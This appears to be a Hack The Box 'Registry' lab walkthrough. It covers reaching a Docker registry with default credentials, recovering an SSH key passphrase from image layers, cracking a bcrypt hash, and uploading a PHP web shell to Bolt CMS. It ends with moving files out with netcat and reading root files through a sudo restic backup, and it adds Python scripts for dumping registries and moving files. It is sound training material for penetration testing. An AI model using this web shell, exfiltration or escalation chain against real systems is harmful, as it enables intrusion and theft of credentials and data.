Hackthebox - Active - Registry
Recon
As always I start with a quick scan of every TCP port, just to see what is open, and worry about service detection afterwards.
$ nmap -T4 -p- -oX ./nmapb.xml registry.htb
Then convert that to HTML to make it readable.
$ xsltproc ./nmapb.xml -o ./nmapb.html
Alright, it looks like ports 22, 80 and 443 are open. Let's rescan just those ports with the -A switch, which turns on version detection, OS detection, the default NSE scripts and traceroute.
$ nmap -T4 -A -p22,80,443 -oX nmapf.xml registry.htb
Then I'll convert that to HTML also.
$ xsltproc ./nmapf.xml -o ./nmapf.html
Ok so we got OpenSSH 7.6p1 on 22 and nginx on 80 and 443.
Let’s see what is on the website
Default nginx page.
When we see an SSL page it is always a good idea to take a look at the certificate, since the subject or SAN often gives away extra hostnames.
Here it is issued to a subdomain or vhost, docker.registry.htb.
I added this to my /etc/hosts and tried to browse the site.
It returns a completely empty page. No source code or anything, but also no error messages.
I started up a dirb scan as well as nikto to see if they could find anything interesting.
Nikto found the /v2/_catalog endpoint (the Docker Registry v2 API) and reported that it accepts admin/admin.
It let me log in with admin/admin, just like nikto said.
If you are not super familiar with docker (like me), now would be a good time to do a google search and learn about it at least at a basic level.
https://www.docker.com/why-docker
My basic understanding is this:
Docker works a bit like a virtual machine, but at the application layer rather than the OS layer: containers share the host's kernel. It takes an application and its dependencies and wraps them up in a container image. The goal is a packaged application that can run on any system: even on a highly customised OS, a program packaged with docker has all the dependencies it needs and runs the same way everywhere.
Hopefully that's enough to get you started on understanding what docker is.
So when the API lists bolt-image as a repository, that tells me there is only one image stored in this registry, and its name is “bolt-image”.
I found this webpage that talks about attacking a docker registry
https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/
We can get a little more info about bolt-image from the tags endpoint:
http://docker.registry.htb/v2/bolt-image/tags/list
The only tag for bolt-image is “latest”.
Let’s pull down the manifests for latest
http://docker.registry.htb/v2/bolt-image/manifests/latest
Let's grab all the blobSums (the layer digests listed under fsLayers in the manifest) and open them up.
Just paste each sha256 blobSum onto the end of the blobs URL:
http://docker.registry.htb/v2/bolt-image/blobs/<blobSum>
Save each one to your computer.
There were 12 in total (the same digest can appear more than once in a manifest, so it is worth de-duplicating before you download).
The blobs are gzip-compressed tar archives (the registry serves them as application/vnd.docker.image.rootfs.diff.tar.gzip). Giving them a .zip extension was just so my archive manager would open them; gunzip or tar handle them directly.
I created a folder for each blob, named after the first four characters of the digest.
Unzipped the blobs into there, and now we have a tar in each folder, which we untar.
We see a bunch of folders, some with very little data, some with much more. Each layer only holds the files that changed in that step of the image build, so the interesting files can be in any of them.
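The manual walk above (catalog, tags, manifest, blobs, unpack, grep) scripted end to end, as an added example that is not part of the original write-up. It pulls the layer digests out of either a schema 1 manifest (fsLayers[].blobSum, as on this box) or a schema 2 / OCI one (layers[].digest), de-duplicates them, unpacks each gzipped tar layer in memory and reports files matching a few secret patterns. The registry URL, the admin/admin credentials and the patterns are assumptions; the sample manifest and sample layer at the bottom are constructed so it can be exercised offline, and dump_registry is the only part that touches the network.

```python
"""Walk a Docker Registry v2 API (catalog -> tags -> manifest -> blobs) and
grep every layer for secrets. Added example, not code from the write-up;
the URL and credentials passed to dump_registry are placeholders, and the
sample manifest/layer below are constructed for the offline check."""
import base64
import io
import json
import re
import tarfile
import urllib.request

# Patterns worth stopping on when a layer is unpacked (assumed, extend as needed).
SECRET_PATTERNS = [
    re.compile(rb'send\s+"[^"]*"'),                      # expect script typing a passphrase
    re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    re.compile(rb"(?i)passw(?:or)?d\s*[=:]\s*\S+"),
]
ACCEPT = ("application/vnd.docker.distribution.manifest.v2+json, "
          "application/vnd.docker.distribution.manifest.v1+json")


def registry_get(base_url, path, user=None, password=None):
    """GET base_url + path with optional HTTP basic auth; returns raw bytes."""
    req = urllib.request.Request(base_url.rstrip("/") + path, headers={"Accept": ACCEPT})
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


def layer_digests(manifest):
    """Layer digests in order of first appearance. Schema 1 lists them as
    fsLayers[].blobSum (newest layer first), schema 2 / OCI as layers[].digest
    (base first). Empty layers repeat the same digest, hence the de-dup."""
    if manifest.get("schemaVersion") == 1:
        raw = [layer["blobSum"] for layer in manifest.get("fsLayers", [])]
    else:
        raw = [layer["digest"] for layer in manifest.get("layers", [])]
    return list(dict.fromkeys(raw))


def scan_layer(blob, patterns=SECRET_PATTERNS):
    """Unpack one gzipped tar layer in memory; return (path, match) pairs,
    with paths relative to the image root."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            hits += [(member.name, m.group(0).decode(errors="replace"))
                     for pat in patterns for m in pat.finditer(data)]
    return hits


def dump_registry(base_url, user=None, password=None):
    """Live walk of every repo, tag and layer; returns (image, digest, path, match)
    tuples. The only function here that touches the network."""
    hits = []
    catalog = json.loads(registry_get(base_url, "/v2/_catalog", user, password))
    for repo in catalog.get("repositories", []):
        tags = json.loads(registry_get(base_url, f"/v2/{repo}/tags/list", user, password))
        for tag in tags.get("tags") or []:
            manifest = json.loads(registry_get(base_url, f"/v2/{repo}/manifests/{tag}", user, password))
            for digest in layer_digests(manifest):
                blob = registry_get(base_url, f"/v2/{repo}/blobs/{digest}", user, password)
                hits += [(f"{repo}:{tag}", digest, path, match) for path, match in scan_layer(blob)]
    return hits


# ---- constructed samples for the offline check (not data from the box) ----
SAMPLE_MANIFEST_V1 = {"schemaVersion": 1, "name": "bolt-image", "tag": "latest",
                      "fsLayers": [{"blobSum": "sha256:aaaa"}, {"blobSum": "sha256:bbbb"},
                                   {"blobSum": "sha256:aaaa"}]}
SAMPLE_MANIFEST_V2 = {"schemaVersion": 2,
                      "layers": [{"digest": "sha256:cccc"}, {"digest": "sha256:dddd"}]}


def build_sample_layer():
    """A gzipped tar shaped like a real layer: one boring file plus an expect
    script that types an SSH key passphrase, the 01-ssh.sh pattern."""
    files = {
        "etc/hostname": b"bolt\n",
        "etc/profile.d/01-ssh.sh": (b"#!/usr/bin/expect -f\n"
                                    b"spawn ssh-add /root/.ssh/id_rsa\n"
                                    b'expect "Enter passphrase for /root/.ssh/id_rsa:"\n'
                                    b'send "hunter2\\n";\ninteract\n'),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_layer(build_sample_layer()):
        print(hit)
```

Against a live registry you would call dump_registry("http://docker.registry.htb", "admin", "admin"); the offline sample shows the kind of hit you are looking for, an expect script feeding a passphrase, without touching the network.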
In folder 302 I found this shell script,
01-ssh.sh
which looks like it contains the passphrase for a private key:
#!/usr/bin/expect -f
#eval `ssh-agent -s`
# Load root's key into the agent non-interactively: wait for the passphrase prompt and type it.
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
Under this folder I found some more goodies
~/Desktop/HTB/registry/blobs/gzip/2931a/sha256_2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791_FILES/root$
Under .ssh
A private key and some other documents
Here is a user name in the config file.
Then back under the /root directory is ./.bash_history.
You can see them create a user named bolt, then delete it. I assume this has to do with when they created the docker instance of bolt; they didn't want to leave the user on the actual machine.
Then they create the private key we just found.
Exploit
Let's see if we can connect to the machine using the private key we just found. First we need to tighten the permissions on the file, because otherwise ssh will complain that the key is too open and refuse to use it (600 is the usual setting; 700 also works, since the check is only that group and others have no access).
$ chmod 700 ./id_rsa
Dang it wants a passphrase….
But didn’t we find a passphrase?
From 01-ssh.sh
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
Let's try that passphrase. We can drop the \n, since that is just expect pressing Enter after typing it.
YAY!! We got in.
Let’s see if we can get the user hash now
bolt@bolt:~$ ls
user.txt
bolt@bolt:~$ cat user.txt
ytc********************************
User is cool and what not…. But I want to be David Bowie level cool…. Let’s get root and make David Happy
Poking around in /var/www/
I came across a directory name bolt.
index.html
A website
Poking around the file system some more I found this file, ./bolt.db
In /var/html/bolt/app
I tried just using netcat to send the file over, but it would never make a connection.
I set up on my Kali box
nc -lnvp 5555 > bolt.db
And on the bolt box
nc 10.10.14.48 5555 < bolt.db
But like I said, it would never make the connection. I tried FTP too, but it wouldn't connect either.
I guessed at that point that there was some outbound filtering on the box. Maybe I could connect in instead with netcat, with the box doing the listening.
On bolt I did
$ nc -lnvp 5555 < ./bolt.db
Then on my Kali box
$ nc registry.htb 5555 > bolt.db
Yay, I got the DB. Let's open it up.
There is a table here named users,
and it contains a record for admin
with this
$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
under password...
Silly DB, that's not a password, it's a hash.
TunnelsUp's hash analyzer says it's a bcrypt hash (the $2y$ prefix and the cost of 10 give it away).
Let's fire up hashcat and see if we can find the bugger in rockyou.txt.
First I save the hash in a file named hash.
Then, since it's bcrypt, use -m 3200:
$ hashcat -m 3200 ./hash /home/circusmonkey/rockyou.txt --force
Since my kali is a VM I have to use --force to get it to run. Bcrypt at cost 10 is slow on purpose, so expect this to take a while even against a small wordlist.
strawberry huh?
Can we login with admin/strawberry
Sure can..
Now let's figure out priv esc from here.
So we have a couple of things going on here...
We can't upload php files.
Any file we upload under File Management gets deleted.
Here, if we upload an HTML file to File Management,
it gets deleted pretty quickly.
But if we upload things under the theme directories, they stick.
I chose the skeleton theme to hold my payloads because I liked the name.
You can see some other ways I tried to get around the upload filter.
So now that we can keep files on the server, let's see if we can get it to allow php files.
Under Configuration -> Main configuration we can see the filter in place: the list of file extensions the CMS will accept on upload.
All we need to do here is add php to this list.
However this resets too (just like the uploads, the config gets put back periodically), so you'll need to work quickly; I found you needed to hit save twice for the new filter to take effect.
So I decided to use this simple web shell, which gives me a form I can use to run commands as the user the web service runs as.
https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
So now,
with this file saved on my kali box as easyshell.php,
I'll add php to the filter list, save it, and quickly upload the shell to the skeleton theme folder.
Here is the folder listing showing easyshell.php in the themes folder.
Now let's browse to it and see if we get execution.
There we go. Let's try to ping our kali box too, just to make sure we can reach it.
I just did ping 10.10.14.48
Here is my tcpdump showing the pings.
Cool. Now let's try to get a shell that is not part of the docker app.
I didn't have any luck getting a bind or reverse shell using netcat. ICMP getting through doesn't mean TCP does, as the outbound filtering we hit earlier already suggested.
But that won't stop us from some more enumeration.
sudo -l gave me this output
Cool, I can run a program called restic via sudo with no password.
What is restic?
Looks like it's backup software.
And it looks like we are able to run a backup with root privileges and no password. The -r switch (--repo) is the name/path of the repository we are backing up to.
Here is the documentation on the restic repos
https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html
One of the things on this page is the next clue to how we can leverage this.
One of the repository types we can use is called a “REST server”,
which fits perfectly with the command sudo -l says we can issue.
You initialise one using
restic -r rest:https://user:pass@host:8000/my_backup_repo/ init
Then the backup command looks like this:
restic backup -r rest:http://restservername/folder followed by the target of the backup. We will use /root to grab all the files out of the root folder, which is hopefully where the root hash is on this box.
Restic creates encrypted backups which require a password. I don't really like typing passwords in, because I often mistype them. Luckily restic lets us supply a password file with the -p (--password-file) flag.
So some pseudo logic of what we are trying to do:
Use restic with its sudo powers for the www-data account to back up the /root directory to a rest-server, then use the bolt account to open the repository and get the root hash.
I’ll setup the rest server on my attacking kali box
Installation is pretty easy
https://github.com/restic/rest-server
I used
sudo git clone https://github.com/restic/rest-server.git
to clone the repo into my /opt folder.
If you have golang installed on kali:
go run build.go
If you don't have golang, just sudo apt-get install golang.
There aren't a lot of flags that need to be set to get it running.
Just two we really care about. By default rest-server requires a user/pass, so we will use --no-auth to get around that. The other flag is --path, which says which directory to use as the repository root.
Here is what our command will look like on our kali box:
$ ./rest-server --path /tmp/ --no-auth
We are simply starting the rest server with the path /tmp and telling it not to use authentication.
The next part of the setup for restic is to initialise the repo,
which should look something like this:
restic -r rest:https://user:pass@host:8000/my_backup_repo/ init
Then we would be able to issue our backup command to back up whatever target we want to our rest-server repo:
restic backup -r rest:http://10.10.14.48:8000/reponame /root
This command sure looks a lot like our entry in the sudoers file, so it should allow us to run it as root with no password. Keep the arguments in the same order sudo -l shows them; sudoers matches the whole command line against its pattern.
So we will use both accounts to accomplish this, since our php shell is not interactive. I'm going to use the bolt SSH session for every command except the sudo backup command.
As the bolt user I’ve created some folder in the tmp directory to save my password file and restore the repo to.
/tmp/circusmonkey/restore
/tmp/circusmonkey/storage
I'm going to create the password file first.
Now we can start our rest-server on the attacking box and initialise the repo from the
bolt SSH session on registry.
On kali
$ ./rest-server --path /tmp/ --no-auth
Now for the initialisation on the registry box
restic -r rest:http://10.10.14.48:8000/repo -p ./storage/pass.txt init
Oh yeah, this box can't talk out... Poop.
OK, we still have to use a rest server to get our elevated rights from the sudoers entry.
The box also won't talk to github to clone the repo.
I think our only hope here is that the rest-server executable we built is portable (Go binaries are usually statically linked) and we can move it to registry without any dependencies that would keep it from working.
But remember earlier, when we were exfiltrating the DB, that we had to use registry as the listener and our attacking machine as the client. Now we need to do the same thing but change the direction of the file.
So on bolt we will do
nc -lvnp 4444 > rest-server
This command basically says listen on port 4444 and whatever comes in there, stick it in a file called rest-server.
And on our kali box, from the /opt/rest-server folder, we will do
nc registry.htb 4444 < rest-server
This command says take the contents of rest-server and send it to registry.htb on port 4444.
Let’s give it a try
Here is what it looks like on the registry side.
You can see that I started in the /tmp/circusmonkey/storage folder where I'm storing the pass.txt file.
Then I started my netcat listener to receive the rest-server file. You have to just kind of guess how long the file transfer is going to take and then stop it; compare a checksum (md5sum or sha256sum) of the file on both ends before trusting it, since a truncated binary just fails in confusing ways.
Then another ls shows the file in the directory.
Now we need to give it execution rights:
chmod +x ./rest-server (you can see I almost always type a capital X by mistake, which doesn't work).
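Both transfers on this box (the bolt.db exfil earlier and the rest-server upload here) ran netcat backwards, with the filtered host listening and the attacking machine connecting in, and both left you guessing when the transfer had finished. The following is an added example, not code from the write-up, of the same pull-style pattern with a length prefix and a SHA-256 check, so the receiving side knows exactly when the file is complete and whether it arrived intact. Both roles run in one process on 127.0.0.1 for the self-check; on an engagement the listen_once side is what you run on the box and the connect side on your machine, in whichever direction you need. Ports are ephemeral and the payloads are constructed.

```python
"""Pull-style file transfer for a host that cannot connect out, with a
length prefix and a SHA-256 digest, instead of guessing when to Ctrl-C a
netcat listener. Added example; not from the write-up."""
import hashlib
import socket
import struct
import threading

HEADER = struct.Struct("!Q32s")   # 8-byte big-endian length, then sha256 of the body
SAMPLE_PAYLOAD = bytes(range(256)) * 400   # constructed stand-in for bolt.db / rest-server


def send_framed(sock, data):
    """Write header + body; the peer can then read exactly len(data) bytes."""
    sock.sendall(HEADER.pack(len(data), hashlib.sha256(data).digest()) + data)


def recv_exact(sock, n):
    """Read exactly n bytes, or raise if the peer goes away early."""
    chunks, remaining = [], n
    while remaining:
        chunk = sock.recv(min(remaining, 65536))
        if not chunk:
            raise ConnectionError(f"peer closed with {remaining} bytes outstanding")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def recv_framed(sock):
    """Read header + body and refuse the data if the digest does not match."""
    length, digest = HEADER.unpack(recv_exact(sock, HEADER.size))
    data = recv_exact(sock, length)
    if hashlib.sha256(data).digest() != digest:
        raise ValueError("sha256 mismatch: transfer corrupted or truncated")
    return data


def listen_once(handler, host="127.0.0.1", port=0):
    """The `nc -lnvp` role: bind, accept one client, run handler(conn) in a
    thread. Returns (bound_port, thread, result); result[0] holds handler's
    return value once the thread finishes."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    result = [None]

    def run():
        conn, _ = srv.accept()
        with conn:
            result[0] = handler(conn)
        srv.close()

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread, result


def exfil(data, host="127.0.0.1"):
    """Box listens and serves (nc -lnvp 5555 < bolt.db); attacker connects
    and pulls (nc registry.htb 5555 > bolt.db)."""
    port, thread, _ = listen_once(lambda conn: send_framed(conn, data), host)
    with socket.create_connection((host, port), timeout=10) as s:
        received = recv_framed(s)
    thread.join(10)
    return received


def infil(data, host="127.0.0.1"):
    """Box listens and receives (nc -lvnp 4444 > rest-server); attacker
    connects and pushes (nc registry.htb 4444 < rest-server)."""
    port, thread, result = listen_once(recv_framed, host)
    with socket.create_connection((host, port), timeout=10) as s:
        send_framed(s, data)
    thread.join(10)
    return result[0]


def tamper_detected():
    """Constructed failure case: a body that does not match its header digest
    must be rejected rather than silently written to disk."""
    a, b = socket.socketpair()
    with a, b:
        a.sendall(HEADER.pack(3, b"\x00" * 32) + b"abc")
        try:
            recv_framed(b)
        except ValueError:
            return True
    return False


if __name__ == "__main__":
    print("exfil ok:", exfil(SAMPLE_PAYLOAD) == SAMPLE_PAYLOAD)
    print("infil ok:", infil(SAMPLE_PAYLOAD) == SAMPLE_PAYLOAD)
    print("tamper detected:", tamper_detected())
```

The framing is the whole point: with raw netcat the receiver has no way to tell "done" from "stalled", and a half-written rest-server binary gives an opaque error on execution instead of an obvious one at transfer time.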
Here is what happened on the attacking box
Not nearly as eventful
Now for the moment of truth: will this work?
Woot, the same usage errors as running it on my kali box with no switches, so the binary runs.
So let's fire up the server.
./rest-server --path /tmp/circusmonkey/repo --no-auth &
Now lets initialize our repo, using our password file to insert the password
restic -r rest:http://localhost:8000/backup_repo/ init -p /tmp/circusmonkey/storage/pass.txt
Now we need to back up /root so we can grab the root.txt file:
sudo /usr/bin/restic backup -r rest:http://localhost:8000/backup_repo /root -p /tmp/circusmonkey/storage/pass.txt
That looks promising
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00
duration: 0:00
snapshot f82d2b6e saved
I tried restoring via the rest server but kept getting this error:
Fatal: unable to open config file: <config/> does not exist
Is there a repository at the following location?
rest:http://localhost:8000/back_repo
Note the repository name in the error is back_repo, not the backup_repo we initialised; a mistyped repository path gives exactly this message.
Luckily the rest-server has served its purpose and we can just interact with the repo on disk now at /tmp/circusmonkey/repo/backup_repo.
restic -r /tmp/circusmonkey/repo/backup_repo/ -p /tmp/circusmonkey/storage/pass.txt ls f82d2b6e
The ls here lets us view the files in the snapshot.
root.txt is there.
We just need to restore the snapshot into our restore folder and see if we can get that hash.
restic -r /tmp/circusmonkey/repo/backup_repo/ -p /tmp/circusmonkey/storage/pass.txt restore latest --target /tmp/circusmonkey/restore/
There are a bunch of errors about permissions (restic is trying to give the restored files their original root ownership, which bolt can't do), but...
We still get our hash.
drwx------ 7 bolt bolt 4096 Oct 21 10:37 root
bolt@bolt:/tmp/circusmonkey/restore$ cd root
bolt@bolt:/tmp/circusmonkey/restore/root$ ls
config.yml cron.sh root.txt
bolt@bolt:/tmp/circusmonkey/restore/root$ cat root.txt
ntrkz********************************